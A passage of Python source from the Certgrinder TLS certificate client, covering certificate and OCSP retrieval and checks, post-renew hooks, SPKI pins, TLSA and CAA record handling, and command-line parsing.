len(issuer.public_bytes(primitives.serialization.Encoding.PEM))\n\n logger.info(\n f\"Success! Got {len(certificate.public_bytes(primitives.serialization.Encoding.PEM))} bytes certificate and {issuerlen} bytes representing {len(issuers)} issuer certificates from certgrinderd\"\n )\n\n # save cert, chain and concat\n self.save_certificate(certificate, self.certificate_path)\n self.save_certificate(certificate, self.certificate_chain_path, issuers)\n self.save_certificate(issuers[0], self.issuer_path, issuers[1:])\n self.save_concat_certkey(self.keypair, certificate, issuers, self.concat_path)\n\n # all done\n self.hook_needed = True\n logger.debug(\n f\"Saved new certificate and chain to files {self.certificate_chain_path}, {self.certificate_path}, and {self.concat_path}\"\n )\n return True\n\n def check_certificate(\n self,\n certificate: typing.Optional[cryptography.x509.Certificate] = None,\n public_key: typing.Optional[\n typing.Union[\n openssl.rsa._RSAPublicKey,\n primitives.asymmetric.ed25519.Ed25519PublicKey,\n ]\n ] = None,\n ) -> bool:\n \"\"\"Check certificate validity and returns True or False.\n\n This method is called by self.grind() once per domainset when the \"check certificate\"\n subcommand is invoked.\n It reads the certificate from self.certificate_path if there is no certificate arg\n\n Args:\n certificate: The certificate to be checked\n public_key: The keypair the certificate is based on\n\n Returns:\n True if everything is OK, False otherwise\n \"\"\"\n # load certificate from disk?\n if not certificate:\n # does the file exist?\n if os.path.exists(self.certificate_chain_path):\n certificate = self.load_certificates(self.certificate_chain_path)[0]\n else:\n logger.error(f\"Certificate {self.certificate_chain_path} not found\")\n self.error = True\n return False\n\n # keep mypy happy in spite of the mixed type self.conf dict\n assert isinstance(self.conf[\"invalid-ca-cn-list\"], list)\n assert isinstance(self.conf[\"cert-renew-threshold-days\"], int)\n # check cert\n valid = self.check_certificate_validity(\n certificate=certificate,\n invalid_ca_cn_list=[]\n if self.conf[\"staging\"]\n else [str(x) for x in self.conf[\"invalid-ca-cn-list\"]],\n threshold_days=self.conf[\"cert-renew-threshold-days\"],\n public_key=public_key,\n san_names=self.domainset,\n )\n # set self.error if cert is not valid (we may need the information later)\n if not valid:\n self.error = True\n return valid\n\n def show_certificate(self) -> None:\n \"\"\"The ``show certificate`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n if not os.path.exists(self.certificate_path):\n logger.error(f\"Certificate {self.certificate_path} not found\")\n return\n certificate = self.load_certificates(self.certificate_path)[0]\n logger.info(\n f\"- Showing certificate for keytype '{self.keytype}' for domain set: {self.domainset}\"\n )\n logger.info(f\"Certificate keypair path: {self.keypair_path}\")\n logger.info(f\"Certificate chain path: {self.certificate_chain_path}\")\n logger.info(f\"Certificate path: {self.certificate_path}\")\n logger.info(f\"Certificate serial: {certificate.serial_number}\")\n logger.info(f\"Certificate subject: {certificate.subject}\")\n logger.info(f\"Certificate issuer: {certificate.issuer}\")\n san = certificate.extensions.get_extension_for_oid(\n cryptography.x509.oid.ExtensionOID.SUBJECT_ALTERNATIVE_NAME\n )\n assert isinstance(san.value, cryptography.x509.SubjectAlternativeName)\n logger.info(\n f\"Certificate SAN: {san.value.get_values_for_type(cryptography.x509.DNSName)}\"\n )\n logger.info(f\"Certificate not valid before: {certificate.not_valid_before}\")\n logger.info(f\"Certificate not valid after: {certificate.not_valid_after}\")\n\n # OCSP METHODS\n\n @staticmethod\n def load_ocsp_response(\n path: str,\n ) -> ocsp.OCSPResponse:\n \"\"\"Reads OCSP response in DER format from the path and returns the object.\n\n Args:\n path: The path to read the OCSP response from\n\n Returns:\n The OCSP response object\n \"\"\"\n with open(path, \"rb\") as f:\n ocsp_response_data = f.read()\n return ocsp.load_der_ocsp_response(ocsp_response_data)\n\n def get_ocsp(\n self,\n certificate: typing.Optional[cryptography.x509.Certificate] = None,\n issuers: typing.List[cryptography.x509.Certificate] = [],\n stdout: typing.Optional[bytes] = None,\n ) -> bool:\n \"\"\"The ``get ocsp`` subcommand method, called for each domainset by ``self.grind()``.\n\n Args:\n certificate: The certificate to get OCSP response for (optional)\n issuers: The list of issuer(s) of the certificate to get OCSP response for (optional)\n stdout: The mock OCSP response to return instead of calling certgrinderd (optional, used for unit tests)\n\n Returns:\n None\n \"\"\"\n if not certificate or not issuers:\n # read chain from disk\n with open(self.certificate_chain_path, \"rb\") as f:\n certificate_bytes_list = self.split_pem_chain(f.read())\n try:\n certificate = self.load_certificates(path=self.certificate_path)[0]\n except FileNotFoundError:\n logger.warning(\n f\"Certificate {self.certificate_path} not found, parsing certificate from chain (this is a workaround for upgrades from older versions where foo-certificate.crt was not written separately).\"\n )\n certificate = cryptography.x509.load_pem_x509_certificate(\n certificate_bytes_list[0], default_backend()\n )\n self.save_certificate(certificate, self.certificate_path)\n\n try:\n issuers = self.load_certificates(path=self.issuer_path)\n except FileNotFoundError:\n logger.warning(\n f\"Issuer cert {self.issuer_path} not found, parsing issuer from chain (this is a workaround for upgrades from older versions where foo-issuer.crt was not written separately).\"\n )\n issuers = []\n for issuerbytes in certificate_bytes_list[1:]:\n issuers.append(\n cryptography.x509.load_pem_x509_certificate(\n issuerbytes, default_backend()\n )\n )\n self.save_certificate(issuers[0], self.issuer_path, issuers[1:])\n\n # we need the full chain to get OCSP\n stdin = certificate.public_bytes(primitives.serialization.Encoding.PEM)\n for issuer in issuers:\n stdin += issuer.public_bytes(primitives.serialization.Encoding.PEM)\n\n logger.debug(\"sending this to certgrinderd to get ocsp:\")\n logger.debug(stdin)\n if stdout is None:\n # get ocsp response from certgrinderd\n stdout = self.run_certgrinderd(stdin=stdin, command=[\"get\", \"ocsp\"])\n\n if not stdout:\n logger.error(\"Did not get an OCSP response in stdout from certgrinderd\")\n return False\n\n ocsp_response = self.parse_certgrinderd_ocsp_output(stdout)\n if not ocsp_response:\n logger.error(\"Did not get an OCSP response :(\")\n return False\n\n logger.info(\"Success! Got OCSP response from certgrinderd.\")\n\n # save OCSP response\n self.save_ocsp_response(\n ocsp_response=ocsp_response, path=self.ocsp_response_path\n )\n\n # all done\n self.hook_needed = True\n logger.debug(f\"Saved new OCSP response to file {self.ocsp_response_path}\")\n return True\n\n def check_ocsp(self) -> bool:\n \"\"\"The ``check ocsp`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n True if the OCSP response was found and is not too old, False otherwise\n \"\"\"\n if not os.path.exists(self.ocsp_response_path):\n logger.error(\n f\"OCSP response not found for keytype {self.keytype} for domainset: {self.domainset}\"\n )\n self.error = True\n return False\n\n # parse the OCSP response\n ocsp_response = self.load_ocsp_response(self.ocsp_response_path)\n\n # consider the response produced_at (rather than next_update)\n validity = ocsp_response.next_update - ocsp_response.produced_at\n passed = datetime.datetime.utcnow() - ocsp_response.produced_at\n percent = (passed / validity) * 100\n logger.debug(f\"{percent} percent of OCSP response validity period has passed\")\n\n if percent > self.conf[\"ocsp-renew-threshold-percent\"]:\n logger.debug(\n f\"OCSP response is too old for keytype {self.keytype} for domainset: {self.domainset} ({round(percent,2)}% of the time between produced_at and next_update has passed, the limit is {self.conf['ocsp-renew-threshold-percent']}%), returning False\"\n )\n self.error = True\n return False\n\n # all good\n return True\n\n def show_ocsp(self) -> None:\n \"\"\"The ``show ocsp`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n if not os.path.exists(self.ocsp_response_path):\n logger.error(f\"OCSP response not found for domainset: {self.domainset}\")\n return\n\n ocsp_response = self.load_ocsp_response(self.ocsp_response_path)\n logger.info(\n f\"- Showing OCSP response for keytype {self.keytype} domain set: {self.domainset}\"\n )\n logger.info(f\"Certificate status: {ocsp_response.certificate_status}\")\n logger.info(f\"This update: {ocsp_response.this_update}\")\n logger.info(f\"Produced at: {ocsp_response.produced_at}\")\n logger.info(f\"Next update: {ocsp_response.next_update}\")\n logger.info(f\"Revocation time: {ocsp_response.revocation_time}\")\n logger.info(f\"Revocation reason: {ocsp_response.revocation_reason}\")\n\n @staticmethod\n def parse_certgrinderd_ocsp_output(\n certgrinderd_stdout: bytes,\n ) -> typing.Optional[ocsp.OCSPResponse]:\n \"\"\"Parse a DER encoded binary OCSP response as returned by Certgrinderd.\n\n Args:\n certgrinderd_output: The bytes representing the OCSP response in DER format\n\n Returns:\n cryptography.x509.ocsp.OCSPResponse\n \"\"\"\n try:\n return ocsp.load_der_ocsp_response(certgrinderd_stdout)\n except ValueError:\n logger.error(\"Unable to parse OCSP response\")\n return False\n\n @staticmethod\n def save_ocsp_response(\n ocsp_response: ocsp.OCSPResponse,\n path: str,\n ) -> None:\n \"\"\"Save the OCSP response to disk in DER format.\n\n Args:\n ocsp_response: The OCSP response to save\n path: The path to save in\n\n Returns:\n None\n \"\"\"\n with open(path, \"wb\") as f:\n f.write(ocsp_response.public_bytes(primitives.serialization.Encoding.DER))\n\n # POST RENEW HOOK METHOD\n\n def run_post_renew_hooks(self) -> bool:\n \"\"\"Loops over configured post_renew_hooks and executables in post_renew_hooks_dir and runs them.\n\n Returns:\n None\n \"\"\"\n # Process any configured post-renew-hooks\n if \"post-renew-hooks\" not in self.conf or not self.conf[\"post-renew-hooks\"]:\n logger.debug(\"No post-renew-hooks found in config\")\n else:\n # loop over and run hooks\n assert isinstance(self.conf[\"post-renew-hooks\"], list)\n for hook in self.conf[\"post-renew-hooks\"]:\n self.run_post_renew_hook(hook.split(\" \"))\n\n # Process any executables in post-renew-hooks-dir if configured\n if (\n \"post-renew-hooks-dir\" not in self.conf\n or not self.conf[\"post-renew-hooks-dir\"]\n ):\n logger.debug(\"No post-renew-hooks-dir found in config\")\n else:\n # loop over files in the hooks dir\n assert isinstance(self.conf[\"post-renew-hooks-dir\"], str)\n for hook in os.listdir(self.conf[\"post-renew-hooks-dir\"]):\n # skip directories and files not executable by the current user\n if os.path.isfile(\n os.path.join(self.conf[\"post-renew-hooks-dir\"], hook)\n ) and os.access(\n os.path.join(self.conf[\"post-renew-hooks-dir\"], hook), os.X_OK\n ):\n command = os.path.join(self.conf[\"post-renew-hooks-dir\"], hook)\n if (\n \"post-renew-hooks-dir-runner\" in self.conf\n and self.conf[\"post-renew-hooks-dir-runner\"]\n ):\n assert isinstance(self.conf[\"post-renew-hooks-dir-runner\"], str)\n # use the configured hook runner\n self.run_post_renew_hook(\n [self.conf[\"post-renew-hooks-dir-runner\"]] + [command]\n )\n else:\n # run hooks in dir as is\n self.run_post_renew_hook([command])\n\n # all done\n return True\n\n @staticmethod\n def run_post_renew_hook(hook: typing.List[str]) -> bool:\n \"\"\"Run a specific post renew hook.\n\n Args:\n hook: A list of string components of the command and arguments\n\n Returns: True if exit code was 0, False otherwise.\n \"\"\"\n logger.info(f\"Running post renew hook: {hook}\")\n start = datetime.datetime.now()\n p = subprocess.Popen(hook)\n runtime = datetime.datetime.now() - start\n exitcode = p.wait()\n if exitcode != 0:\n logger.error(\n f\"Got exit code {exitcode} when running post_renew_hook {hook} - hook runtime was {runtime}\"\n )\n return False\n else:\n logger.info(\n f\"Post renew hook {hook} ended with exit code 0, good. Hook runtime was {runtime}\"\n )\n return True\n\n # SPKI METHODS\n\n @staticmethod\n def generate_spki(derkey: bytes) -> str:\n \"\"\"Generate and return a pin-sha256 spki hpkp style pin for the provided public key.\n\n OpenSSL equivalent command is:\n openssl x509 -in example.com.crt -pubkey -noout | openssl pkey -pubin -outform der | openssl dgst -sha256 -binary | openssl base64\n\n Args:\n derkey: The bytes representing the public key in DER format\n\n Returns:\n A string of the SPKI pin\n \"\"\"\n return base64.b64encode(hashlib.sha256(derkey).digest()).decode(\"ASCII\")\n\n @classmethod\n def output_spki(cls, derkey: bytes) -> None:\n \"\"\"Get and print the spki pin for the supplied DER public key.\n\n Args:\n derkey: The bytes representation of the DER formatted public key\n\n Returns:\n None\n \"\"\"\n spki = cls.generate_spki(derkey)\n logger.info(f\"pin-sha256='{spki}'\")\n\n def show_spki(self) -> None:\n \"\"\"The ``show spki`` subcommand method, called for each domainset by ``self.grind()``.\n\n Call ``self.output_spki()`` with the DER formatted public key and output the result.\n\n Returns:\n None\n \"\"\"\n logger.debug(\n f\"Generated SPKI pin-sha256 for public key for domainset {self.domainset}:\"\n )\n self.output_spki(derkey=self.get_der_pubkey(self.keypair))\n\n # TLSA METHODS\n\n @staticmethod\n def generate_tlsa_record(derkey: bytes, tlsatype: str) -> str:\n \"\"\"Generate and return the data part of a TLSA record of the requested type.\n\n TLSA record is generated from the DER formatted public key supplied.\n Returns an uppercase hex string.\n\n Args:\n derkey: The bytes representing the public key in DER format\n tlsatype: The TLSA type (like \"310\")\n\n Returns:\n String of the TLSA data\n\n Raises:\n ValueError: If an unknown TLSA type is passed\n \"\"\"\n if tlsatype == \"310\":\n # Generate DANE-EE Publickey Full (3 1 0) TLSA Record\n return binascii.hexlify(derkey).decode(\"ASCII\").upper()\n elif tlsatype == \"311\":\n # Generate DANE-EE Publickey SHA256 (3 1 1) TLSA Record\n return hashlib.sha256(derkey).hexdigest().upper()\n elif tlsatype == \"312\":\n # Generate DANE-EE Publickey SHA512 (3 1 2) TLSA Record\n return hashlib.sha512(derkey).hexdigest().upper()\n else:\n raise ValueError(f\"Unsupported TLSA type: {tlsatype}\")\n\n @staticmethod\n def lookup_tlsa_record(\n domain: str,\n port: int,\n protocol: str,\n tlsatype: typing.Optional[str] = None,\n nameserver: str = \"\",\n ) -> typing.Optional[typing.List[str]]:\n \"\"\"Lookup TLSA records in DNS for the configured domain, port, and protocol.\n\n Loop over any responses and look for the requested tlsatype.\n Return a list of results, optionally limited to the specified tlsatype, or None.\n Use system resolver unless nameserver is specified.\n\n Args:\n domain: The service domain name (like ``mail.example.com``)\n port: The service port (like ``443``)\n protocol: The service protocol (like ``tcp``)\n tlsatype: The TLSA type (like ``312``)\n nameserver: The DNS server IP to use instead of system resolver (optional)\n\n Returns:\n A list of records or None\n \"\"\"\n record = f\"_{port}._{protocol}.{domain}\"\n nameserverstr = (\n f\"configured DNS server {nameserver}\" if nameserver else \"system resolver\"\n )\n if tlsatype:\n tlsastr = \" \".join(tlsatype)\n tlsadesc = f\"TLSA type {tlsastr}\"\n else:\n tlsadesc = \"all TLSA types\"\n\n logger.debug(\n f\"Looking up TLSA record in DNS using {nameserverstr}: {record} - {tlsadesc}\"\n )\n try:\n if nameserver:\n res = dns.resolver.Resolver(configure=False)\n res.nameservers = [nameserver]\n else:\n res = dns.resolver\n dnsresponse = res.query(record, \"TLSA\")\n except dns.resolver.NXDOMAIN:\n logger.debug(\n f\"NXDOMAIN returned by {nameserverstr}, no TLSA records found in DNS for: {record}\"\n )\n return None\n except dns.resolver.NoAnswer:\n logger.error(\n f\"Empty answer returned by {nameserverstr}. No TLSA records found in DNS for: {record}\"\n )\n return None\n except ValueError:\n logger.error(\n f\"Error parsing DNS server '{nameserver}'. Only IP addresses and https URLs are supported.\"\n )\n sys.exit(1)\n except dns.exception.Timeout:\n logger.error(f\"Timeout while waiting for {nameserverstr}. Error.\")\n sys.exit(1)\n except Exception as E:\n logger.error(f\"Exception {type(E)} received during DNS lookup: {E}\")\n return None\n\n # loop over the responses\n result = []\n for reply in dnsresponse:\n replytype = f\"{reply.usage} {reply.selector} {reply.mtype}\"\n logger.debug(\"Found TLSA record type %s\" % replytype)\n if not tlsatype or tlsastr == replytype:\n # add this record to the result to be returned\n result.append(binascii.hexlify(reply.cert).decode(\"ASCII\"))\n\n if result:\n logger.debug(f\"Returning {len(result)} TLSA records\")\n return result\n else:\n logger.debug(\n f\"{len(dnsresponse)} TLSA records found, but none of the type {tlsatype} were found\"\n )\n return None\n\n @classmethod\n def output_tlsa_record(\n cls,\n derkey: bytes,\n domain: str,\n port: int,\n protocol: str,\n tlsatype: str,\n warning: bool = False,\n ) -> None:\n \"\"\"Output the TLSA record for the given DER key, domain, port, protocol and tlsatype.\n\n Call ``self.generate_tlsa()`` and output the result formatted as a DNS record\n\n Args:\n derkey: The bytes representation the public key in DER format\n domain: The service domain name (like ``mail.example.com``)\n port: The service port (like ``443``)\n protocol: The service protocol (like ``tcp``)\n tlsatype: The TLSA type (like ``312``)\n warning: Set True to output at level ``WARNING`` (default ``INFO``)\n\n Returns:\n None\n \"\"\"\n tlsarecord = f\"_{port}._{protocol}.{domain}\"\n tlsadata = cls.generate_tlsa_record(derkey, tlsatype)\n tlsastr = \" \".join(tlsatype)\n if warning:\n logger.warning(f\"{tlsarecord} TLSA {tlsastr} {tlsadata}\")\n else:\n logger.info(f\"{tlsarecord} TLSA {tlsastr} {tlsadata}\")\n\n @classmethod\n def verify_tlsa_record(\n cls,\n derkey: bytes,\n domain: str,\n port: int,\n protocol: str,\n tlsatype: str,\n nameserver: str = \"\",\n ) -> bool:\n \"\"\"Check the TLSA records for the port/protocol/domain and DER key in the DNS.\n\n Output the info needed to fix things when missing records are found.\n\n Args:\n derkey: The bytes representation the public key in DER format\n domain: The service domain name (like ``mail.example.com``)\n port: The service port (like ``443``)\n protocol: The service protocol (like ``tcp``)\n tlsatype: The TLSA type (like ``312``)\n nameserver: The DNS server IP to use instead of system resolver (optional)\n\n Return:\n True if all is well, False if one or more problems are found\n \"\"\"\n tlsarecord = f\"_{port}._{protocol}.{domain}\"\n tlsadata = cls.generate_tlsa_record(derkey, tlsatype)\n tlsastr = \" \".join(map(str, tlsatype))\n\n # do the DNS lookup\n dns_reply = cls.lookup_tlsa_record(\n domain=domain,\n port=port,\n protocol=protocol,\n tlsatype=tlsatype,\n nameserver=nameserver,\n )\n\n # bail out early if we got nothing from DNS\n if dns_reply is None:\n logger.warning(\n f\"No TLSA records for name {tlsarecord} of type {tlsastr} was found in DNS. This record needs to be added:\"\n )\n cls.output_tlsa_record(\n derkey=derkey,\n domain=domain,\n port=port,\n protocol=protocol,\n tlsatype=tlsatype,\n warning=True,\n )\n return False\n\n # we have a response\n logger.debug(\n f\"Received DNS response for TLSA type {tlsastr}: {len(dns_reply)} answers - looking for an answer matching the public key...\"\n )\n for reply in dns_reply:\n if reply.upper() == tlsadata:\n logger.info(\n f\"TLSA record for name {tlsarecord} type {tlsastr} matching the local key found in DNS, good.\"\n )\n return True\n\n logger.warning(\n f\"None of the TLSA records found in DNS for the name {tlsarecord} and type {tlsatype} match the local key. This record needs to be added to the DNS:\"\n )\n cls.output_tlsa_record(\n derkey=derkey,\n domain=domain,\n port=port,\n protocol=protocol,\n tlsatype=tlsatype,\n warning=True,\n )\n return False\n\n def show_tlsa(self) -> None:\n \"\"\"The 'show tlsa' subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n logger.info(\n f\"- Showing TLSA records for keytype '{self.keytype}' for domain set: {self.domainset} port '{self.conf['tlsa-port']}' protocol '{self.conf['tlsa-protocol']}':\"\n )\n for domain in self.domainset:\n # keep mypy happy\n assert isinstance(self.conf[\"tlsa-type-list\"], list)\n assert isinstance(self.conf[\"tlsa-port\"], int)\n assert isinstance(self.conf[\"tlsa-protocol\"], str)\n for tlsatype in self.conf[\"tlsa-type-list\"]:\n self.output_tlsa_record(\n derkey=self.get_der_pubkey(self.keypair),\n domain=domain,\n port=self.conf[\"tlsa-port\"],\n protocol=self.conf[\"tlsa-protocol\"],\n tlsatype=tlsatype,\n )\n\n def check_tlsa(self) -> None:\n \"\"\"The 'check tlsa' subcommand method, called for each domainset by ``self.grind()``.\n\n Loops over the configured TLSA types and calls ``self.verify_tlsa_record()`` which\n does the heavy lifting.\n\n Returns:\n None\n \"\"\"\n for domain in self.domainset:\n logger.debug(\n f\"Checking DNS for TLSA records for {domain} port {self.conf['tlsa-port']} protocol {self.conf['tlsa-protocol']}:\"\n )\n assert isinstance(self.conf[\"tlsa-type-list\"], list)\n assert isinstance(self.conf[\"tlsa-port\"], int)\n assert isinstance(self.conf[\"tlsa-protocol\"], str)\n assert isinstance(self.conf[\"name-server\"], str)\n for tlsatype in self.conf[\"tlsa-type-list\"]:\n result = self.verify_tlsa_record(\n derkey=self.get_der_pubkey(self.keypair),\n domain=domain,\n port=self.conf[\"tlsa-port\"],\n protocol=self.conf[\"tlsa-protocol\"],\n tlsatype=tlsatype,\n nameserver=self.conf[\"name-server\"],\n )\n if not result and not self.error:\n logger.debug(\n \"Problem discovered in check mode, setting self.error=True\"\n )\n self.error = True\n logger.debug(\n f\"Done checking DNS for TLSA records for {domain} port {self.conf['tlsa-port']} protocol {self.conf['tlsa-protocol']}\"\n )\n\n # CAA METHODS\n\n def show_caa(self) -> None:\n \"\"\"The ``show caa`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n # get acmeaccount from certgrinderd\n stdout = self.run_certgrinderd(stdin=b\"\", command=[\"show\", \"acmeaccount\"])\n url: str = \"\"\n for line in stdout.decode().split(\"\\n\"):\n if line[:15] == \" Account URL: \":\n url = line[15:]\n break\n else:\n logger.error(\"certgrinderd did not return an acmeaccount\")\n sys.exit(1)\n\n # output CAA records\n for domain in self.domainset:\n if domain[0] == \"*\":\n # wildcard certificates only support dns-01\n print(\n f'{domain} IN CAA 128 issuewild \"letsencrypt.org; validationmethods=dns-01; accounturi={url}\"'\n )\n print(f'{domain} IN CAA 128 issue \";\"')\n else:\n print(\n f'{domain} IN CAA 128 issue \"letsencrypt.org; validationmethods={self.conf[\"caa-validation-methods\"]}; accounturi={url}\"'\n )\n print(f'{domain} IN CAA 128 issuewild \";\"')\n\n # MAIN METHODS\n\n def periodic(self) -> bool:\n \"\"\"The periodic method performs periodic maintenance tasks.\n\n This method is called by the 'periodic' command, from cron or similar.\n It starts out by sleeping for a random period and then checks certificates and renews as needed.\n \"\"\"\n if self.conf[\"periodic-sleep-minutes\"]:\n assert isinstance(\n self.conf[\"periodic-sleep-minutes\"], int\n ) # make mypy happy\n sleep = random.randint(0, self.conf[\"periodic-sleep-minutes\"])\n logger.debug(f\"Sleeping for {sleep} minutes before doing periodic...\")\n time.sleep(sleep * 60)\n\n # check if we have a valid certificate for this domainset\n if not self.check_certificate():\n # certificate is not valid, get new\n if not self.get_certificate():\n # unable to get new certificate\n logger.error(\n f\"Failed getting a new certificate for domainset: {self.domainset}\"\n )\n return False\n\n # check if we have valid OCSP responses\n if not self.check_ocsp():\n # OCSP response not valid, get new\n if not self.get_ocsp():\n # unable to get new OCSP response\n logger.error(\n f\"Failed getting a new OCSP response for domainset: {self.domainset}\"\n )\n return False\n\n # all good\n return True\n\n def show_paths(self) -> None:\n \"\"\"The ``show paths`` subcommand method, called for each domainset by ``self.grind()``.\n\n Returns:\n None\n \"\"\"\n msg = {True: \"file found\", False: \"file not found\"}\n logger.info(\n f\"- Showing paths for keytype '{self.keytype}' for domain set: {self.domainset}\"\n )\n logger.info(\n f\"Keypair path: {self.keypair_path} [{msg[os.path.exists(self.keypair_path)]}]\"\n )\n logger.info(f\"CSR path: {self.csr_path} [{msg[os.path.exists(self.csr_path)]}]\")\n logger.info(\n f\"Certificate path: {self.certificate_path} [{msg[os.path.exists(self.certificate_path)]}]\"\n )\n logger.info(\n f\"Chain path: {self.certificate_chain_path} [{msg[os.path.exists(self.certificate_chain_path)]}]\"\n )\n logger.info(\n f\"Issuer certificate path: {self.issuer_path} [{msg[os.path.exists(self.issuer_path)]}]\"\n )\n logger.info(\n f\"Key+chain concat path: {self.concat_path} [{msg[os.path.exists(self.concat_path)]}]\"\n )\n logger.info(\n f\"OCSP response path: {self.ocsp_response_path} [{msg[os.path.exists(self.ocsp_response_path)]}]\"\n )\n\n def check_connection(\n self,\n stdout: typing.Optional[bytes] = None,\n ) -> bool:\n \"\"\"The ``check connection`` subcommand method.\n\n Args:\n stdout: The certgrinderd response to use instead of calling certgrinderd (optional)\n\n Returns:\n None\n \"\"\"\n if stdout is None:\n # call certgrinderd ping command\n stdout = self.run_certgrinderd(stdin=b\"\", command=[\"ping\"])\n\n if not stdout or stdout.decode() != \"pong\\n\":\n logger.error(\n f\"Did not get a pong response in stdout from certgrinderd, got '{stdout!r}' instead\"\n )\n self.error = True\n return False\n\n logger.info(\"Success! Got pong response from certgrinderd.\")\n return True\n\n def get_filename(self, hostname: str) -> str:\n \"\"\"Calculate the hostname string to be used for filenames.\n\n Files are named after the ascii idna representation of the first hostname\n in the list (which is also the CN in the subject of the CSR and certificate).\n\n Max filename length on some platforms is 255 bytes, but a hostname could be\n up to 253 bytes (RFC 1035 section 2.3.4), and we need some room for the usage\n and keytype and extension, so we only use the last 230 bytes of the ascii idna\n representation of the hostname for the filename, leaving 25 bytes for metadata.\n\n Args:\n domainset: The list of hostnames\n\n Returns:\n The string to use in filenames\n \"\"\"\n return hostname.encode(\"idna\").decode(\"ascii\")[-230:]\n\n def load_domainset(self, domainset: typing.List[str], keytype: str) -> None:\n \"\"\"Prepare paths and create/load private key.\n\n Args:\n domainset: The list of hostnames to load\n keytype: The keytype to use, \"rsa\" or \"ecdsa\".\n\n Returns:\n None\n \"\"\"\n logger.debug(f\"Loading domainset {domainset} for keytype {keytype}\")\n self.domainset = domainset\n self.keytype = keytype\n assert isinstance(self.conf[\"path\"], str)\n\n # get the hostname to use for filenames\n filename = self.get_filename(domainset[0])\n\n # keypair\n self.keypair_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-keypair.{keytype}.key\"\n )\n logger.debug(f\"keypair path: {self.keypair_path}\")\n\n # CSR\n self.csr_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-request.{keytype}.csr\"\n )\n logger.debug(f\"CSR path: {self.csr_path}\")\n\n # certificate chain\n self.certificate_chain_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-chain.{keytype}.crt\"\n )\n logger.debug(f\"Certificate chain path: {self.certificate_chain_path}\")\n\n # certificate only\n self.certificate_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-certificate.{keytype}.crt\"\n )\n logger.debug(f\"certificate path: {self.certificate_path}\")\n\n # issuer certificate\n self.issuer_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-issuer.{keytype}.crt\"\n )\n logger.debug(f\"issuer path: {self.issuer_path}\")\n\n # concat of privkey + chain\n self.concat_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-concat.{keytype}.pem\"\n )\n logger.debug(\"concat path: %s\" % self.concat_path)\n\n # OCSP response\n self.ocsp_response_path = os.path.join(\n self.conf[\"path\"], f\"{filename}-response.{keytype}.ocsp\"\n )\n logger.debug(\"OCSP response path: %s\" % self.ocsp_response_path)\n\n # warn about legacy paths, remove this check at some point in future\n self.keypair_path_old = os.path.join(\n self.conf[\"path\"], self.domainset[0].encode(\"idna\").decode(\"ascii\")\n )\n if os.path.exists(self.keypair_path_old) and not os.path.exists(\n self.keypair_path\n ):\n logger.error(\n f\"Keypair {self.keypair_path} not found, but the old filename {self.keypair_path_old} was found. Please rename files as described in the CHANGELOG.\"\n )\n sys.exit(1)\n\n # finally load or create the keypair\n if os.path.exists(self.keypair_path):\n # load private key\n self.keypair = self.load_keypair(self.keypair_path)\n logger.debug(f\"Loaded {keytype} keypair from {self.keypair_path}\")\n else:\n # create new private key\n self.keypair = self.generate_private_key(keytype=keytype)\n self.save_keypair(self.keypair, self.keypair_path)\n logger.debug(f\"Created new {keytype} keypair, saved to {self.keypair_path}\")\n\n def grind(self, args: argparse.Namespace) -> None:\n \"\"\"Loop over enabled keytypes and domainsets in ``self.conf[\"domain-list\"]`` and call args.method for each.\"\"\"\n logger.debug(f\"Certgrinder {__version__} running\")\n\n if args.method == \"check_connection\":\n # we only need to do this once, and we don't need to load_domainset() first\n getattr(self, args.method)()\n else:\n # loop over keytypes\n kcounter = 0\n assert isinstance(self.conf[\"key-type-list\"], list)\n for keytype in self.conf[\"key-type-list\"]:\n if kcounter == 1 and args.method in [\"show_caa\"]:\n # we dont need to see CAA records once per keytype\n break\n kcounter += 1\n # loop over domains\n dcounter = 0\n assert isinstance(self.conf[\"domain-list\"], list)\n for domainset in self.conf[\"domain-list\"]:\n dcounter += 1\n logger.debug(\n f\"-- Processing keytype {keytype} ({kcounter} of {len(self.conf['key-type-list'])} keytypes) for domainset {dcounter} of {len(self.conf['domain-list'])}: {domainset.split(',')}\"\n )\n # prepare paths and create/load private key\n self.load_domainset(domainset=domainset.split(\",\"), keytype=keytype)\n # run the requested method\n getattr(self, args.method)()\n\n # do we need to run post-renew hooks?\n if self.hook_needed:\n logger.info(\n \"At least one certificate or OCSP response was renewed, running post renew hooks...\"\n )\n self.run_post_renew_hooks()\n\n # are we running in check mode?\n if args.command == \"check\" and self.error:\n logger.error(\n \"Running in check mode and one or more errors were encountered, exit code 1\"\n )\n sys.exit(1)\n\n logger.debug(\"All done, exiting cleanly\")\n sys.exit(0)\n\n\ndef get_parser() -> argparse.ArgumentParser:\n \"\"\"Create and return the argparse object.\"\"\"\n parser = argparse.ArgumentParser(\n description=f\"Certgrinder version {__version__}. See the manpage or ReadTheDocs for more info.\"\n )\n # add topmost subparser for main command\n subparsers = parser.add_subparsers(\n help=\"Command (required)\", dest=\"command\", required=True\n )\n\n # \"check\" command\n check_parser = subparsers.add_parser(\n \"check\",\n help='Use the \"check\" command to check certificates, OCSP responses and TLSA records. Returns exit code 0 if all is well, and 1 if something needs attention.',\n )\n check_subparsers = check_parser.add_subparsers(\n help=\"Specify what to check using one of the available check sub-commands.\",\n dest=\"subcommand\",\n required=True,\n )\n\n # \"check certificate\" subcommand\n check_certificate_parser = check_subparsers.add_parser(\n \"certificate\",\n help=\"Tell certgrinder to check certificate validity for all configured domainsets. Returns exit code 1 if any problem is found, exit code 0 if all is well.\",\n )\n check_certificate_parser.set_defaults(method=\"check_certificate\")\n\n # \"check connection\" subcommand\n check_connection_parser = check_subparsers.add_parser(\n \"connection\",\n help=\"Tell certgrinder to check the connection to the certgrinderd server by calling the certgrinderd 'ping' command which should return the string 'pong' if all is well.\",\n )\n check_connection_parser.set_defaults(method=\"check_connection\")\n\n # \"check ocsp\" subcommand\n check_ocsp_parser = check_subparsers.add_parser(\n \"ocsp\",\n help=\"Tell certgrinder to check the 